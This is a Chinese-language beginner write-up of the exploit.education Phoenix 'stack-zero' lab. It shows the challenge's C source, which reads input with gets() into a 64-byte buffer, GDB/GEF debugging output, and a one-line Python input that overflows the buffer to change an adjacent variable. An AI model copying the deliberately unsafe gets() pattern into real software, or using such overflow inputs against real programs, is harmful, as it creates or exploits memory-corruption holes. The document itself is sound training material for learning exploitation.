exploit.educatioin/stack zero

exploit.education/stack-zero

作为一个逆向、pwn的新手新新手，找个练习的平台还是不错的。最近在看 liveOverFlow的Youtube视频，发现了这个东西，感觉不错，跟着做一做，希望能够有所提升。

环境

1. 在https://exploit.education网站下载Phoenix 虚拟镜像
2. 安装qemu
3. 解压镜像文件，执行其中的boot-exploit-education-phoenix-amd64.sh
4. 连接虚拟机：

   ssh user@127.0.0.1 -p 2222

步骤

首先更新系统，更新gdb gef, 参考https://github.com/hugsy/gef

在/opt/phoenix/amd64下面就是我们要解决的binary了，在exploit.education上面还有源码 ，来看下：

/*
 * phoenix/stack-zero, by https://exploit.education
 *
 * The aim is to change the contents of the changeme variable.
 *
 * Scientists have recently discovered a previously unknown species of
 * kangaroos, approximately in the middle of Western Australia. These
 * kangaroos are remarkable, as their insanely powerful hind legs give them
 * the ability to jump higher than a one story house (which is approximately
 * 15 feet, or 4.5 metres), simply because houses can't can't jump.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

char *gets(char *);

int main(int argc, char **argv) {
  struct {
    char buffer[64];
    volatile int changeme;
  } locals;

  printf("%s\n", BANNER);

  locals.changeme = 0;
  gets(locals.buffer);

  if (locals.changeme != 0) {
    puts("Well done, the 'changeme' variable has been changed!");
  } else {
    puts(
        "Uh oh, 'changeme' has not yet been changed. Would you like to try "
        "again?");
  }

  exit(0);
}

locals结构体有两个成员，一个是64字节大小的char类型的buffer变量，一个是4字节大小的volatile int类型的changeme变量。

程序首先会输出一句话，然后将locals结构体中的changeme成员赋值为0，然后通过使用gets函数获取用户输入，将内容写入locals结构体中的buffer中去。

$ man gets
...
DESCRIPTION
	...
    The gets() function is equivalent to fgets() with an infinite size and a stream of stdin, except that the newline character (if any) is not stored in the string.  It is the caller's responsibility to ensure that the input line, if any, is sufficiently short to fit in the string.
...
SECURITY CONSIDERATIONS
     The gets() function cannot be used securely.  Because of its lack of bounds checking, and the inability for the calling program to reliably determine the length of the next incoming
     line, the use of this function enables malicious users to arbitrarily change a running program's functionality through a buffer overflow attack.  It is strongly suggested that the
     fgets() function be used in all cases.  (See the FSA.)

gets函数没有检查输入的大小，就直接将输入写入到地址中，造成了bof。很简单的一个程序。过关方式是将locals.changeme改变。

使用GDB调试一下：

user@phoenix-amd64:/opt/phoenix/amd64$ gdb -q stack-zero 
GEF for linux ready, type `gef' to start, `gef config' to configure
78 commands loaded for GDB 8.2.1 using Python engine 3.5
[*] 2 commands could not be loaded, run `gef missing` to know why.
Reading symbols from stack-zero...(no debugging symbols found)...done.
gef➤  start
[+] Breaking at '{<text variable, no debug info>} 0x4005dd <main>'
[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0x0               
$rbx   : 0x00007fffffffe668  →  0x00007fffffffe878  →  "/opt/phoenix/amd64/stack-zero"
$rcx   : 0x0               
$rdx   : 0x00007fffffffe678  →  0x00007fffffffe896  →  "LC_ALL=en_US.UTF-8"
$rsp   : 0x00007fffffffe610  →  0x0000000000000001
$rbp   : 0x00007fffffffe610  →  0x0000000000000001
$rsi   : 0x00007fffffffe668  →  0x00007fffffffe878  →  "/opt/phoenix/amd64/stack-zero"
$rdi   : 0x1               
$rip   : 0x00000000004005e1  →  <main+4> sub rsp, 0x60
$r8    : 0x0000000000400672  →  <_fini+0> push rax
$r9    : 0x0               
$r10   : 0x00007ffff7dfa767  →  0x4c00636f6c6c616d ("malloc"?)
$r11   : 0x00007ffff7ffd9e0  →  0x00007ffff7d6b000  →  0x00010102464c457f
$r12   : 0x00007fffffffe678  →  0x00007fffffffe896  →  "LC_ALL=en_US.UTF-8"
$r13   : 0x00000000004005dd  →  <main+0> push rbp
$r14   : 0x0               
$r15   : 0x0               
$eflags: [carry PARITY adjust zero sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffe610│+0x0000: 0x0000000000000001	 ← $rsp, $rbp
0x00007fffffffe618│+0x0008: 0x00007ffff7d8fd62  →  <__libc_start_main+54> mov edi, eax
0x00007fffffffe620│+0x0010: 0x0000000000000000
0x00007fffffffe628│+0x0018: 0x00007fffffffe660  →  0x0000000000000001
0x00007fffffffe630│+0x0020: 0x0000000000000000
0x00007fffffffe638│+0x0028: 0x00007ffff7ffdbc8  →  0x00007ffff7ffdbc8  →  [loop detected]
0x00007fffffffe640│+0x0030: 0x0400000100003e00
0x00007fffffffe648│+0x0038: 0x00000000004004a9  →   nop DWORD PTR [rax+0x0]
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
     0x4005d8 <frame_dummy+40> jmp    0x4004e0 <register_tm_clones>
     0x4005dd <main+0>         push   rbp
     0x4005de <main+1>         mov    rbp, rsp
 →   0x4005e1 <main+4>         sub    rsp, 0x60
     0x4005e5 <main+8>         mov    DWORD PTR [rbp-0x54], edi
     0x4005e8 <main+11>        mov    QWORD PTR [rbp-0x60], rsi
     0x4005ec <main+15>        mov    edi, 0x400680
     0x4005f1 <main+20>        call   0x400440 <puts@plt>
     0x4005f6 <main+25>        mov    DWORD PTR [rbp-0x10], 0x0
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "stack-zero", stopped, reason: BREAKPOINT
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x4005e1 → main()

查看一下汇编代码：

gef➤  disassemble
Dump of assembler code for function main:
   0x00000000004005dd <+0>:	push   rbp
   0x00000000004005de <+1>:	mov    rbp,rsp
=> 0x00000000004005e1 <+4>:	sub    rsp,0x60
   0x00000000004005e5 <+8>:	mov    DWORD PTR [rbp-0x54],edi
   0x00000000004005e8 <+11>:	mov    QWORD PTR [rbp-0x60],rsi
   0x00000000004005ec <+15>:	mov    edi,0x400680
   0x00000000004005f1 <+20>:	call   0x400440 <puts@plt>
   0x00000000004005f6 <+25>:	mov    DWORD PTR [rbp-0x10],0x0 ;<=====将changeme赋值为0
   0x00000000004005fd <+32>:	lea    rax,[rbp-0x50] ;<=====取栈上的一个地址，给RAX
   0x0000000000400601 <+36>:	mov    rdi,rax ;<=====RAX=RDI为gets的参数
   0x0000000000400604 <+39>:	call   0x400430 <gets@plt> ;<=====这里调用gets函数
   0x0000000000400609 <+44>:	mov    eax,DWORD PTR [rbp-0x10] ;<=====将changeme的值赋值给eax，在这里设置数点，来观察我们的输入在栈上是什么样子
   0x000000000040060c <+47>:	test   eax,eax ;<=====eax是否为0
   0x000000000040060e <+49>:	je     0x40061c <main+63>
   0x0000000000400610 <+51>:	mov    edi,0x4006d0
   0x0000000000400615 <+56>:	call   0x400440 <puts@plt>
   0x000000000040061a <+61>:	jmp    0x400626 <main+73>
   0x000000000040061c <+63>:	mov    edi,0x400708
   0x0000000000400621 <+68>:	call   0x400440 <puts@plt>
   0x0000000000400626 <+73>:	mov    edi,0x0
   0x000000000040062b <+78>:	call   0x400450 <exit@plt>
End of assembler dump.

由于中64位系统，参数的时候会依次使用rdi,rsi,rdx,rcx,r8和r9。

gef➤  break * 0x0000000000400609
Breakpoint 1 at 0x400609
gef➤  c
Continuing.
Welcome to phoenix/stack-zero, brought to you by https://exploit.education
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP1 ;<=====这里是我们的输入

Breakpoint 1, 0x0000000000400609 in main ()
[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0x00007fffffffe5c0  →  "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMM[...]"
$rbx   : 0x00007fffffffe668  →  0x00007fffffffe878  →  "/opt/phoenix/amd64/stack-zero"
$rcx   : 0x8080808080808080
$rdx   : 0x00007fffffffe668  →  0x00007fffffffe878  →  "/opt/phoenix/amd64/stack-zero"
$rsp   : 0x00007fffffffe5b0  →  0x00007fffffffe668  →  0x00007fffffffe878  →  "/opt/phoenix/amd64/stack-zero"
$rbp   : 0x00007fffffffe610  →  0x0000000000000001
$rsi   : 0xfefefefefefefeff
$rdi   : 0x00007fffffffe602  →  0x0000000000000000
$rip   : 0x0000000000400609  →  <main+44> mov eax, DWORD PTR [rbp-0x10]
$r8    : 0x00007fffffffe5c0  →  "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMM[...]"
$r9    : 0xa0a0a0a0a0a0a0a  ("\n\n\n\n\n\n\n\n"?)
$r10   : 0x8080808080808080
$r11   : 0x2               
$r12   : 0x00007fffffffe678  →  0x00007fffffffe896  →  "LC_ALL=en_US.UTF-8"
$r13   : 0x00000000004005dd  →  <main+0> push rbp
$r14   : 0x0               
$r15   : 0x0               
$eflags: [carry PARITY adjust zero sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffe5b0│+0x0000: 0x00007fffffffe668  →  0x00007fffffffe878  →  "/opt/phoenix/amd64/stack-zero"	 ← $rsp
0x00007fffffffe5b8│+0x0008: 0x0000000100000000
0x00007fffffffe5c0│+0x0010: "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMM[...]"	 ← $rax, $r8
0x00007fffffffe5c8│+0x0018: "CCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOO[...]"
0x00007fffffffe5d0│+0x0020: "EEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP1"
0x00007fffffffe5d8│+0x0028: "GGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP1"
0x00007fffffffe5e0│+0x0030: "IIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP1"
0x00007fffffffe5e8│+0x0038: "KKKKLLLLMMMMNNNNOOOOPPPP1"
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
     0x4005fd <main+32>        lea    rax, [rbp-0x50]
     0x400601 <main+36>        mov    rdi, rax
     0x400604 <main+39>        call   0x400430 <gets@plt>
 →   0x400609 <main+44>        mov    eax, DWORD PTR [rbp-0x10]
     0x40060c <main+47>        test   eax, eax
     0x40060e <main+49>        je     0x40061c <main+63>
     0x400610 <main+51>        mov    edi, 0x4006d0
     0x400615 <main+56>        call   0x400440 <puts@plt>
     0x40061a <main+61>        jmp    0x400626 <main+73>
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "stack-zero", stopped, reason: BREAKPOINT
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x400609 → main()
gef➤  x/s $rbp-0x50 ;<================查看我们的输入
0x7fffffffe5c0:	"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP1"
gef➤  x/s $rbp-0x10 ;<================查看changeme在栈中的值
0x7fffffffe600:	"1"
gef➤  c
Continuing.
Well done, the 'changeme' variable has been changed!
[Inferior 1 (process 2862) exited normally]

OK，一句命令的话，就是这样：

user@phoenix-amd64:/opt/phoenix/amd64$ python -c 'print "A"*64+"1"' | ./stack-zero 
Welcome to phoenix/stack-zero, brought to you by https://exploit.education
Well done, the 'changeme' variable has been changed!

总结

1. gdb打开文件之后要start运行起来
2. gdb命令：
   • disassemble: 查看当前函数的汇编代码
   • break: 设置数点，如果后面跟一个地址，加*
   • x/s $rbp-0x10: 以字符串的格式查看[rbp-0x10]地址处的值
   • c: continue，继续运行程序